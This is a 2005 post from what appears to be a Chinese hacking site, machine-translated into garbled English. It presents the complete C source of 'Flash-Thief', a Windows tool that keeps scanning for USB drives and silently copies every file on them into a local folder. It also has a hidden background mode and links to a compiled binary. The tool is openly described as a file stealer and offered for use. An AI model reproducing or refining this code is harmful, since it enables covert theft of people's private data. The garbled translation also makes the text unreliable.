U disk thieves the DIY-bug warning-the black bar safety net

2005-09-30T00:00:00
ID MYHACK58:6220052862
Type myhack58
Reporter 佚名
Modified 2005-09-30T00:00:00

Description

See an issue of hacker line of Defense on the on the description write“U disk thieves”that steal U disk all files of the program in the article, anyway also nothing to do, himself wrote one. Below is a used VC++plus MFC to write, I use C API to write, and the name is“U disk thief”, otherwise how would call DIY?^_^

The principle is very simple, that is, every a period of time to detect the drive, find the removable disk on the inside of the contents of the copy into the machine. A few sub-will be done. The code is as follows, for a function can be reference MSDN AND CSDN search also thanks to it it it.

include "windows. h"

include "stdio. h"

include "string. h"

include "direct. h"

char dir[2 6 0];

/*

Optimistic about you, steal things slightly to

*/

void Copy( char* FileName )

{

char dir2[2 6 0];

strcpy( dir2 , dir );

//From the full path to the extracted file name

char* temp = strchr(FileName,'\\');

temp++;

strcat(dir2 , temp );

CopyFile( FileName , dir2 , 1 );

}

void CreateDir( char * path )

{

char temp2[2 6 0];strcpy( temp2 , dir );

char* temp = strchr( path , '\\');

temp++;

strcat(temp2 , temp );

mkdir( temp2 );

}

/*

This function is to traverse the directory to get the file

*/

void GetFile( char* FilePath )

{

char temp[2 6 0],temp1[2 6 0];

strcpy( temp ,FilePath );

WIN32_FIND_DATA FindFileData;

HANDLE hFind;

strcat( temp , "*");

//printf("%s",temp);

hFind = FindFirstFile( temp , &FindFileData );

//printf("%s\n",FindFileData. cFileName );

if ( hFind == INVALID_HANDLE_VALUE )

{

//printf ("Invalid File Handle. GetLastError reports %d\n", GetLastError ());

//exit(0);

}

else

{

//printf("%s",temp1);

do

{

strcpy( temp1 , FilePath );

strcat( temp1 , FindFileData. cFileName );

if(strcmp( FindFileData. cFileName , "." )!= 0&&strcmp( FindFileData. cFileName , ".." )!= 0)

{

if( FindFileData. dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY )

{

strcat( temp1 , "\\" );

CreateDir( temp1 );

GetFile( temp1 );

}

else

{

//printf("%s\n",temp1 );

Copy( temp1 );

}

}

}while( FindNextFile( hFind,&FindFileData ) );

}

FindClose(hFind);

}

/*

This function detects whether the removable disk

*/

int CheckDisk(char *disk)

{

if(GetDriveType(disk)==DRIVE_REMOVABLE)return 0;

return -1;

}

int Steal()

{

char buf[1 0];

DWORD lod=GetLogicalDrives();

/*

GetLogicalDrives returns a 3 2-bit integer, will he converted into a binary, most significant bit represents drive A:, and so on

For example, 1 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

Indicates this machine has drives a,c,d,e

*/

if (lod!= 0)

{

for (int i=0;i<2 6;i++)

{

if ((lod & 1)==1)

{

sprintf(buf,"%c",'A'+i);

strcat(buf,":\\");

if(! CheckDisk(buf))

{

//Now determine the drive is ready to

if(GetVolumeInformation(buf,0,0,0,0,0,0,0))

{

GetFile(buf);//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

//GetFile("j:\\a\\");

}

}

}

lod=lod>>1;

}

}

return 0;

}

int main(int argc, char* argv[])

{

SYSTEMTIME st;

char dtime[2 0],temp[1 0];

GetLocalTime( &st );

itoa( st. wYear ,temp , 1 0 );

strcpy( dtime , temp );

itoa( st. wMonth ,temp , 1 0 );

strcat( dtime , temp );

itoa( st. wDay ,temp , 1 0 );

strcat( dtime , temp );

mkdir( dtime );

getcwd( dir , 2 6 0 );

strcat( dir , "\\");

strcat( dir , dtime );

strcat( dir , "\\" );

if(argc!= 2)

{

printf("\n Flash-Thief 1.0 by lake2 ( http://lake2.126.com ) \n");

printf("Date: \t2005-5-2 8\n");

printf("You can quit this program with Ctrl + C \nand you can run it in hide mode with \'-hide\' \n");

printf("It's nothing with me whatever you do ! \n");

printf("Running.......\ n");

while(1)

{

Steal();

Sleep(3 0 0 0 0);

}

}

else

{

if(strcmp( argv[1] , "-hide" )==0){printf("It's nothing with me whatever you do ! \n");ShellExecute( 0, "open", argv[0], NULL, NULL, SW_HIDE );}

else

printf("Parameter %s is invalid",argv[1]);

}

return 0;

}

The program is command line, add the parameter“-hide”can be run in the background; after running in the current directory to generate the current date folder, steal the stuff are placed in it. The program has a small problem, that is, when the removable device is a removable hard disk, Oh, I'm afraid your hard drive is to Big. Oh well. This problem don't want to change.

VS.net + XP SP1 to compile it, the compiled program here can be the followinghttp://www.0x54.org/lake2/program/flash-thief.exe

Programs up to now I have not use it, in fact I'm a good person^_^